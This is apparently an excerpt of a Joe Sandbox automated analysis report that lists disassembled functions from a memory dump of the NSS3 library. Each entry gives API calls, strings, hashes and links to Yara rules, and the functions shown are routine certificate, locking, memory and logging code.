Opcode ID: 7ef0dd9aa27f6540976b8c1660a2bed7c3e99fac082fe37e898b935799df8099
Instruction ID: 2565bf4c99ea008ec2305cc705cb4b0942931032af9ec240fd0f2fd755ce4d65
Opcode Fuzzy Hash: 7ef0dd9aa27f6540976b8c1660a2bed7c3e99fac082fe37e898b935799df8099
Instruction Fuzzy Hash: CA110DB1B00715ABDF34EB96EA4874573B0BB4A74EF044136E80993E60D774D454CBE1

Function 6C730DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C730BDE), ref: 6C730DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6C730BDE), ref: 6C730DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C730BDE), ref: 6C730DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C730BDE), ref: 6C730E32

Strings

%s incr => %d (find lib), xrefs: 6C730E2D

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 9463c78d70b5dd7bdd27a9f380500c71a9ff5b94c92aeeb72255ee7171f2f197
Instruction ID: ad5255042242800bbcf08a9158a200e03107b8412bd299d3d663b9021df87546
Opcode Fuzzy Hash: 9463c78d70b5dd7bdd27a9f380500c71a9ff5b94c92aeeb72255ee7171f2f197
Instruction Fuzzy Hash: 5C0141727002209FE6309E2ADD49E1773ACDB41A09B04087DE909D3A82E7A2EC14C7E1

Function 6C7EAC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,@]}l,00000000,?,?,6C7C6AC6,?), ref: 6C7EAC2D

Part of subcall function 6C78ADC0: TlsGetValue.KERNEL32(?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AE10
Part of subcall function 6C78ADC0: EnterCriticalSection.KERNEL32(?,?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AE24
Part of subcall function 6C78ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C76D079,00000000,00000001), ref: 6C78AE5A
Part of subcall function 6C78ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AE6F
Part of subcall function 6C78ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AE7F
Part of subcall function 6C78ADC0: TlsGetValue.KERNEL32(?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AEB1
Part of subcall function 6C78ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C76CDBB,?,6C76D079,00000000,00000001), ref: 6C78AEC9

PK11_FreeSymKey.NSS3(?,@]}l,00000000,?,?,6C7C6AC6,?), ref: 6C7EAC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]}l,00000000,?,?,6C7C6AC6,?), ref: 6C7EAC59
free.MOZGLUE(8CB6FF01,6C7C6AC6,?,?,?,?,?,?,?,?,?,?,6C7D5D40,00000000,?,6C7DAAD4), ref: 6C7EAC62

Strings

@]}l, xrefs: 6C7EAC05

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID: @]}l
API String ID: 1595327144-10555402
Opcode ID: 81789f4ffdf6fc0a1811423b08c84cd1fb452f5947db2c3333f97876f7213460
Instruction ID: 6549c77ff69f8057872d0e78f90369ff3eb80c51b2842d8f99b12dfcb873c1be
Opcode Fuzzy Hash: 81789f4ffdf6fc0a1811423b08c84cd1fb452f5947db2c3333f97876f7213460
Instruction Fuzzy Hash: F00171B56012009BDB00CF15E9C4B467BB8AB48728F148074E9098F746D735E804CBA1

Function 6C6CA8E0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 6C7FA480: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C81C3A2,?,?,00000000,00000000), ref: 6C7FA528
Part of subcall function 6C7FA480: sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C7FA6E0

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014576,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6CA94F

Strings

%s at line %d of [%.10s], xrefs: 6C6CA948
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6CA939
/G6/, xrefs: 6C6CA8EA
database corruption, xrefs: 6C6CA943

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$/G6/$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-816543663
Opcode ID: b3f0cb88770d88c4c92e51fa44beec9276dc90899960e7b06960476daee11304
Instruction ID: a307dde73349b102405803758e59a3cf4b9db6cba912bb4c134791be92cc193f
Opcode Fuzzy Hash: b3f0cb88770d88c4c92e51fa44beec9276dc90899960e7b06960476daee11304
Instruction Fuzzy Hash: 19014E31B002045BC7208B69DD05BABB7F5EB45318F454939E95D57B41E731A809C7A6

Function 6C748B50 Relevance: 7.7, APIs: 5, Instructions: 218COMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3 ref: 6C748B5C
CERT_DecodeAVAValue.NSS3 ref: 6C748B67

Part of subcall function 6C748E00: PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C748EED
Part of subcall function 6C748E00: SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C8718D0,?), ref: 6C748F03
Part of subcall function 6C748E00: PR_CallOnce.NSS3(6C8A2AA4,6C7A12D0), ref: 6C748F19
Part of subcall function 6C748E00: PL_FreeArenaPool.NSS3(?), ref: 6C748F2B

SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C748D5C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C748D6B
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C748D76

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Item_Util$Decode$ArenaPoolValueZfree$CallCompareFreeInitOnceQuick
String ID:
API String ID: 185717074-0
Opcode ID: 0b2f8dd38a6241c10cbb34373fa26296834094dbcb1128f17eabedd40295e484
Instruction ID: 6dcb42fdca41ff3266193a50045a145ad1ac5d19de1a8ae290b2dd9e1b2e5ad3
Opcode Fuzzy Hash: 0b2f8dd38a6241c10cbb34373fa26296834094dbcb1128f17eabedd40295e484
Instruction Fuzzy Hash: 06710471E4262D8FDB148A5889907AAB7F1EB49325F19C276D824E77C2D3349C01DBD0

Function 6C6E6D2E Relevance: 7.6, APIs: 5, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 6C6D3C40: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6D3C66
Part of subcall function 6C6D3C40: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6C6D3D04

memcpy.VCRUNTIME140(?,?,?), ref: 6C6E6DC0
memcpy.VCRUNTIME140(?,?,?), ref: 6C6E6DE5

Part of subcall function 6C6E8010: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6E807D
Part of subcall function 6C6E8010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6E80D1
Part of subcall function 6C6E8010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6E810E
Part of subcall function 6C6E8010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6E8140

memcpy.VCRUNTIME140(00000004,00000004,00000000), ref: 6C6E6E7E
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6E6E96
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6E6EC2

Part of subcall function 6C6E7D70: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6E7E27
Part of subcall function 6C6E7D70: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6E7E67

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: _byteswap_ulong$memcpy$_byteswap_ushort
String ID:
API String ID: 3070372028-0
Opcode ID: 848c820c84e3ba32651aa9a9d26f40a2b88f3f9ef7b005cdd258c69f0d4c2721
Instruction ID: 8054ca9b427a6b5085b126418e5d195ee61bb77db2f44a0e0be18dec04af96af
Opcode Fuzzy Hash: 848c820c84e3ba32651aa9a9d26f40a2b88f3f9ef7b005cdd258c69f0d4c2721
Instruction Fuzzy Hash: 5E51B07190D3519FC724CF25C840B6ABBE5FF89318F04892EE89887742E730E919CB96

Function 6C7B4A00 Relevance: 7.6, APIs: 5, Instructions: 126threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C7B4A8D
CERT_SaveSMimeProfile.NSS3(00000000,00000000,00000000), ref: 6C7B4B01
CERT_DestroyCertificate.NSS3(00000000), ref: 6C7B4B12
PR_SetError.NSS3(?,00000000), ref: 6C7B4B1F
CERT_FindCertByIssuerAndSN.NSS3(?,?), ref: 6C7B4B35

Part of subcall function 6C7B04A0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,00000000), ref: 6C7B04B9
Part of subcall function 6C7B04A0: memcmp.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000), ref: 6C7B050A
Part of subcall function 6C7B04A0: memcmp.VCRUNTIME140(?,00000000,?), ref: 6C7B0545

Part of subcall function 6C7B52E0: PORT_NewArena_Util.NSS3(00000400,6C7B4A57,?,00000000), ref: 6C7B52F7
Part of subcall function 6C7B52E0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,6C87301C,WJ{l,?,6C7B4A57,?,00000000), ref: 6C7B5312
Part of subcall function 6C7B52E0: CERT_FindCertByIssuerAndSN.NSS3(?,?,?,?,?,?,?,6C7B4A57,?,00000000), ref: 6C7B5327
Part of subcall function 6C7B52E0: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,6C7B4A57,?,00000000), ref: 6C7B5334

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Find$Arena_CertIssuermemcmp$CertificateCurrentDecodeDestroyErrorFreeItem_MimeProfileQuickSaveTag_Thread
String ID:
API String ID: 3052039812-0
Opcode ID: f2174f745378cefeaad680d7dc80e0e4c15f003483083c2a53d62b9f545c5c8f
Instruction ID: d3aa1b80a4d1a353d735e9472dae0b10d69a7e6213e72c7f83609b3f81e8825e
Opcode Fuzzy Hash: f2174f745378cefeaad680d7dc80e0e4c15f003483083c2a53d62b9f545c5c8f
Instruction Fuzzy Hash: 5C3104B1E012406BEB149E35AE48BBB7AACAF0131DF154134ED14FBB42E731C909D7A5

Function 6C794B00 Relevance: 7.6, APIs: 5, Instructions: 119stringCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,-00000001,00000000,?,?,6C787B3B,00000000,?,?,00000000), ref: 6C794BA3

Part of subcall function 6C798970: TlsGetValue.KERNEL32(?,00000000,6C7461C4,?,6C745639,00000000), ref: 6C798991
Part of subcall function 6C798970: TlsGetValue.KERNEL32(?,?,?,?,?,6C745639,00000000), ref: 6C7989AD
Part of subcall function 6C798970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C745639,00000000), ref: 6C7989C6
Part of subcall function 6C798970: PR_WaitCondVar.NSS3 ref: 6C7989F7
Part of subcall function 6C798970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6C745639,00000000), ref: 6C798A0C

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6C794B44
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6C794B7E
SECMOD_DestroyModule.NSS3(00000000), ref: 6C794C44
free.MOZGLUE(?), ref: 6C794C54

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Valuestrcmp$CondCriticalDestroyEnterErrorModuleSectionUnlockWaitfree
String ID:
API String ID: 3094473128-0
Opcode ID: 016d0391f7a297f55456771222b82dc107b77fabc21a4067138b8e256c1ba7c6
Instruction ID: 123eb85776d6ba374da15a96d05a95fc36ab28a5644d8fc4a8de660487cc43bc
Opcode Fuzzy Hash: 016d0391f7a297f55456771222b82dc107b77fabc21a4067138b8e256c1ba7c6
Instruction Fuzzy Hash: CF419DB66016019FDB209F59FA0975AB7B8AF4231CF244134E8399BB00E735F914DBD1

Function 6C85AA70 Relevance: 7.6, APIs: 5, Instructions: 114COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C85AA86

Part of subcall function 6C7EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7EC2BF

Part of subcall function 6C85A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6C85A662), ref: 6C85A69E
Part of subcall function 6C85A690: PR_NewCondVar.NSS3(?), ref: 6C85A6B4

PR_IntervalNow.NSS3 ref: 6C85AAEC
EnterCriticalSection.KERNEL32(?), ref: 6C85AB0A
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6C85AB67
_PR_MD_UNLOCK.NSS3(?), ref: 6C85AB8B

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CondCriticalEnterErrorIntervalSectionValuecalloc
String ID:
API String ID: 318662135-0
Opcode ID: b5ba7bc43f965d3f0e50a77daac15e7453f7ae923a210eeb0c6e1f96e98ec887
Instruction ID: aa46c9f53227db5b362ee25a823170cb50e4d1bde9c1d10e968dd78b08cf1baf
Opcode Fuzzy Hash: b5ba7bc43f965d3f0e50a77daac15e7453f7ae923a210eeb0c6e1f96e98ec887
Instruction Fuzzy Hash: 664196B5A003059FC7A1CF28CAC059AB7F6BF483187584979E815DB701E771EC54CBA0

Function 6C73EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C73EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6C73EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C73EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C73EEEB
free.MOZGLUE(?), ref: 6C73EEF6

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 426fd81c016d2b689d51bf90eb7fe71994f43be085134931067c220cc3f8ac3a
Instruction ID: f5fb37e8a738348d3126d23e14142192d49f745e09ac7869a177b9347878cd94
Opcode Fuzzy Hash: 426fd81c016d2b689d51bf90eb7fe71994f43be085134931067c220cc3f8ac3a
Instruction Fuzzy Hash: C831F4B16402249BEB209E29DD447667BB8FB46309F041538E95E87A92D735EC14C7D1

Function 6C746AF0 Relevance: 7.6, APIs: 5, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(00000000,6C74B21D,00000000,00000000,6C74B219,?,6C746BFB,00000000,?,00000000,00000000,?,?,?,6C74B21D), ref: 6C746B01

Part of subcall function 6C79FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C79FE08
Part of subcall function 6C79FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C79FE1D
Part of subcall function 6C79FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C79FE62

PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,6C74B219,?,6C746BFB,00000000,?,00000000,00000000,?,?,?,6C74B21D), ref: 6C746B36
PORT_ArenaAlloc_Util.NSS3(00000000,00000030), ref: 6C746B47
SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C746B8A
SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000004,?,0000001C), ref: 6C746BB6

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Item_$DecodeQuick$Errormemcpy
String ID:
API String ID: 1773792728-0
Opcode ID: 687a674214d9d81533070af077b987f4c4a4da5209fbe0d6008185b540a9b2e2
Instruction ID: 55b3862507b3d87a789285b4b170cd39b8e26106fc89a1928e7b5725b5082829
Opcode Fuzzy Hash: 687a674214d9d81533070af077b987f4c4a4da5209fbe0d6008185b540a9b2e2
Instruction Fuzzy Hash: D9214832A003145BEB108F25DF04F5A7BE8DB46358F248529EC08C7B51F731E658CB90

Function 6C7B68A0 Relevance: 7.6, APIs: 5, Instructions: 79COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(?), ref: 6C7B68B4

Part of subcall function 6C809090: TlsGetValue.KERNEL32 ref: 6C8090AB
Part of subcall function 6C809090: TlsGetValue.KERNEL32 ref: 6C8090C9
Part of subcall function 6C809090: EnterCriticalSection.KERNEL32 ref: 6C8090E5
Part of subcall function 6C809090: TlsGetValue.KERNEL32 ref: 6C809116
Part of subcall function 6C809090: LeaveCriticalSection.KERNEL32 ref: 6C80913F

Part of subcall function 6C730F00: PR_GetPageSize.NSS3(6C730936,FFFFE8AE,?,6C6C16B7,00000000,?,6C730936,00000000,?,6C6C204A), ref: 6C730F1B
Part of subcall function 6C730F00: PR_NewLogModule.NSS3(clock,6C730936,FFFFE8AE,?,6C6C16B7,00000000,?,6C730936,00000000,?,6C6C204A), ref: 6C730F25

PR_MillisecondsToInterval.NSS3(?), ref: 6C7B68E6
PR_MillisecondsToInterval.NSS3(?), ref: 6C7B6938
PR_MillisecondsToInterval.NSS3(?), ref: 6C7B6986
PR_ExitMonitor.NSS3(?), ref: 6C7B69BA

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: IntervalMillisecondsValue$CriticalEnterMonitorSection$ExitLeaveModulePageSize
String ID:
API String ID: 1802314673-0
Opcode ID: cdda594c6960cb34a4e6a00bacee63ed52e0b2f1924b52e8dc5cc6807b4f2059
Instruction ID: b5c1a44e79541a45759095dea9d5d0f2637ec21af846ab95c131a27d04c64923
Opcode Fuzzy Hash: cdda594c6960cb34a4e6a00bacee63ed52e0b2f1924b52e8dc5cc6807b4f2059
Instruction Fuzzy Hash: 32316132701911ABEB285F74EE087DABA70BF4530EF040239DA1EA1652D7357968CED3

Function 6C798800 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C7A085A,00000000,?,6C748369,?), ref: 6C798821
TlsGetValue.KERNEL32(?,?,6C7A085A,00000000,?,6C748369,?), ref: 6C79883D
EnterCriticalSection.KERNEL32(?,?,?,6C7A085A,00000000,?,6C748369,?), ref: 6C798856
PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C798887
PR_Unlock.NSS3(?,?,?,?,6C7A085A,00000000,?,6C748369,?), ref: 6C798899

Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307AD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307CD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307D6
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6C204A), ref: 6C7307E4
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,6C6C204A), ref: 6C730864
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C730880
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,6C6C204A), ref: 6C7308CB
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308D7
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308FB

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
